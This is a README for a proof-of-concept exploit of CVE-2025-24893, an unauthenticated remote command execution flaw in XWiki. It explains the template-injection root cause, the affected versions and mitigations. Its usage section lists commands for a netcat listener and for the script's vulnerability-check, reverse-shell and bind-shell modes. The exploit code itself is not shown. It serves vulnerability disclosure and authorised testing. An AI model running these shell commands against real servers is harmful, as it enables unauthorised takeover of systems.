Share
## https://sploitus.com/exploit?id=D5053286-ECDC-527A-B18A-4F57AAB199AA
# CVE-2025-24893 โ€“ XWiki Remote Command Execution (Proof of Concept)

## Overview

This repository contains a **controlled Proof of Concept (PoC)** for **CVE-2025-24893**, an **unauthenticated Remote Command Execution (RCE)** vulnerability affecting **XWiki**.

The vulnerability allows an attacker to execute arbitrary operating system commands on the server due to unsafe server-side template and script evaluation.

---

## About XWiki

XWiki is an open-source enterprise wiki platform commonly used for:

* Internal documentation
* Knowledge bases
* Team collaboration portals

Because XWiki is frequently deployed on **internet-facing servers**, security vulnerabilities in its request handling and scripting logic can have high real-world impact.

---

## Vulnerability Summary

* **CVE ID:** CVE-2025-24893
* **Category:** Server-Side Template Injection leading to Remote Command Execution
* **Attack Vector:** HTTP GET request
* **Authentication Required:** None
* **Impact:** Arbitrary command execution with server privileges

### Root Cause

User-controlled input passed to the `SolrSearch` endpoint was improperly validated and evaluated by the Groovy scripting engine.
This allowed attacker-supplied input to be interpreted as executable server-side code, resulting in command execution on the host system.

---

## Affected Versions

* XWiki versions **up to and including 15.10.10**
* Patched in subsequent releases

---

## Proof of Concept Capabilities

This PoC demonstrates the following:

* **Vulnerability Detection Mode**
  Safely confirms whether the target instance is vulnerable by executing a benign server-side expression.

* **Remote Command Execution**
  Demonstrates arbitrary command execution on the target system.

* **Reverse Shell Execution**
  Establishes an outbound shell connection from the target to the tester.

* **Bind Shell (Optional)**
  Opens a listening shell on the target host (less reliable than reverse shells).

---

## Usage

### Vulnerability Check

```bash
python3 xwiki_cve_2025_24893.py http://target:8080 -m check
```

### Reverse Shell (Recommended)

```bash
nc -lvnp 4444
python3 xwiki_cve_2025_24893.py http://target:8080 -m reverse -lh  -lp 4444
```

### Bind Shell

```bash
python3 xwiki_cve_2025_24893.py http://target:8080 -m bind -lp 4444
```

---

## High-Level Attack Flow

1. A crafted request is sent to the vulnerable `SolrSearch` endpoint
2. Malicious template instructions are injected via user-controlled input
3. The input is evaluated by the Groovy engine as trusted code
4. Arbitrary operating system commands are executed on the server

---

## Mitigation Guidance

* Upgrade XWiki to a patched version immediately
* Restrict access to internal endpoints where possible
* Limit or sandbox server-side scripting functionality
* Monitor application logs for abnormal template execution behavior

---

## Disclaimer

This project is provided **strictly for educational purposes and authorized security testing**.

Any unauthorized use of this code against systems without explicit permission is prohibited.

---

## Credits

* Original vulnerability research and PoC inspiration by **Al Baradi Joy**
* Refactored and extended for educational and defensive security research

---

## Purpose of This Repository

This repository was created to demonstrate:

* Analysis of real-world vulnerabilities
* Safe and responsible proof-of-concept development
* Understanding of server-side template injection and RCE risks
* Defensive awareness and mitigation considerations

---